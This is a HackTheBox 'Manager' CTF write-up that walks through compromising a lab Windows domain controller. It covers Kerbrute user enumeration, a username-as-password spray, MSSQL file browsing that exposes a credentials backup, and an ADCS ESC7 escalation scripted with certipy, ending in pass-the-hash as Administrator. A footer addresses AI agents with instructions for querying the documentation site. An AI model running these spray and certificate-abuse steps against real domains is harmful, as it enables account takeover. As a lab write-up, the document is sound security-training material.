# Manager {% embed url="" %} The following post by 0xb0b is licensed under [CC BY 4.0

](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1) *** ## Recon The target host has multiple open ports indicating a Windows environment, including services such as DNS, web hosting with Microsoft IIS, Active Directory LDAP, Microsoft SQL Server 2019, RPC services, and others, suggesting potential avenues for further exploration and exploitation. We are dealing with a domain controller and received the domain and computer name from the Nmap scan: `manager.htb` `dc01.manager.htb` ```bash ports=$(nmap -p- --min-rate=1000 -T4 manager.htb | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) nmap -sC -sV -p$ports manager.htb ``` ``` Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-16 08:38 EDT Nmap scan report for manager.htb (10.129.120.237) Host is up (0.029s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Manager 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-16 19:38:37Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name) |_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time. | ssl-cert: Subject: commonName=dc01.manager.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:dc01.manager.htb | Not valid before: 2023-07-30T13:51:28 |_Not valid after: 2024-07-29T13:51:28 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name) |_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time. | ssl-cert: Subject: commonName=dc01.manager.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:dc01.manager.htb | Not valid before: 2023-07-30T13:51:28 |_Not valid after: 2024-07-29T13:51:28 1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM | ms-sql-info: | 10.129.120.237:1433: | Version: | name: Microsoft SQL Server 2019 RTM | number: 15.00.2000.00 | Product: Microsoft SQL Server 2019 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | ms-sql-ntlm-info: | 10.129.120.237:1433: | Target_Name: MANAGER | NetBIOS_Domain_Name: MANAGER | NetBIOS_Computer_Name: DC01 | DNS_Domain_Name: manager.htb | DNS_Computer_Name: dc01.manager.htb | DNS_Tree_Name: manager.htb |_ Product_Version: 10.0.17763 |_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time. | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2024-03-16T19:30:16 |_Not valid after: 2054-03-16T19:30:16 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=dc01.manager.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:dc01.manager.htb | Not valid before: 2023-07-30T13:51:28 |_Not valid after: 2024-07-29T13:51:28 |_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name) |_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time. | ssl-cert: Subject: commonName=dc01.manager.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:dc01.manager.htb | Not valid before: 2023-07-30T13:51:28 |_Not valid after: 2024-07-29T13:51:28 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49693/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49694/tcp open msrpc Microsoft Windows RPC 49695/tcp open msrpc Microsoft Windows RPC 49730/tcp open msrpc Microsoft Windows RPC 52872/tcp open msrpc Microsoft Windows RPC 52918/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 6h59m50s, deviation: 0s, median: 6h59m49s | smb2-time: | date: 2024-03-16T19:39:30 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 95.94 second ``` When enumerating the website, nothing could be detected apart from static web pages.

We are probably dealing with an active directory challenge. We can enumerate some users using Kerbrute. For this, we use the `xato-net-10-million-usernames.txt` from SecLists. {% embed url="" %} ```bash ┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager] └─$ ./kerbrute_linux_amd64 userenum -d manager.htb /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt --dc dc01.manager.htb ```

## Initial Foothold We use the output to create a user list. ```bash ┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager] └─$ sed -n 's/.*:\s*$[^@]\+$@manager\.htb.*/\1/p' kerbrute-results.txt > usernames.txt ``` {% code title="usernames.txt" %} ``` ryan guest cheng raven administrator Ryan Raven operator Guest Administrator Cheng jinwoo RYAN RAVEN GUEST Operator ``` {% endcode %} Next, we try a password spray on the SMB port. We do this with the help of NetExec. We will also use the usernames as the password list. Maybe a user has used his username as a password. We issue the parameter `--no-brute` only to insert the password as the username. We have a hit for the user `operator`. ```bash ┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager] └─$ nxc smb manager.htb -u usernames.txt -p usernames.txt --no-brute --continue-on-success ```

Let's see if we can use the credentials found to operate other services in addition to SMB. We can log in to the MSSQL service.

┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager]
└─$ mssqlclient.py manager.htb/operator:operator@manager.htb -windows-auth

We can use `xp_dirtree` to display the folders and files on the system. In the `wwwroot` folder, we find the web.config and a backup zip. ```bash EXEC xp_dirtree 'C:\inetpub\wwwroot', 1, 1; ```

Unfortunately, the `web.config`, which is a common location for stored credentials, cannot be retrieved directly. But the backup.

In the backup, we find an old config, and this contains the credentials for the user `raven`.

Using Evil-WinRM we can log in to the system and find the user flag on the user's desktop.

## Privilege Escalation We use Certipy to find a vulnerable configuration for ADCS. ```bash ┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager] └─$ certipy find -u raven@manager -p '' -dc-ip 10.129.120.237 -vulnerable ```

We see that raven has dangerous permissions that allow the ESC7 attack.

A detailed explanation of the attack can be found here: {% embed url="" %} To issue the attack we place the commands in a simple script, since they have to be issued very quickly in succession. You have to set the password, and if already requests were made the request\_id has to be adjusted. {% code title="esc7.sh" lineNumbers="true" %} ```bash #!/bin/bash # Set variables CA='manager-DC01-CA' USERNAME='raven@manager.htb' PASSWORD='REDACTED' TARGET='manager.htb' REQUEST_ID='13' # Command 1: Add officer certipy ca -ca "$CA" -add-officer raven -username "$USERNAME" -password "$PASSWORD" && # Command 2: Enable template certipy ca -ca "$CA" -enable-template SubCA -username "$USERNAME" -password "$PASSWORD" && # Command 3: Request certipy req -username "$USERNAME" -password "$PASSWORD" -ca "$CA" -target "$TARGET" -template SubCA -upn administrator@manager.htb && # Command 4: Issue request certipy ca -ca "$CA" -issue-request "$REQUEST_ID" -username "$USERNAME" -password "$PASSWORD" && # Command 5: Retrieve certipy req -username "$USERNAME" -password "$PASSWORD" -ca "$CA" -target "$TARGET" -retrieve "$REQUEST_ID" ``` {% endcode %} By executing the script we get the Administrator certificate

With that, we can retrieve the admin hash. The next commands have to be queued in quick succession and might fail. We have to synchronize our time with the DC. ``` ┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager/certipy] └─$ sudo ntpdate -s manager.htb && certipy auth -pfx administrator.pfx ```

We use Evil-WinRM to login as the Administrator by passing the retrieved hash. On the Desktop of the administrator, we find the final flag.

[^1]: --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xb0b.gitbook.io/writeups/hackthebox/2024/manager.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.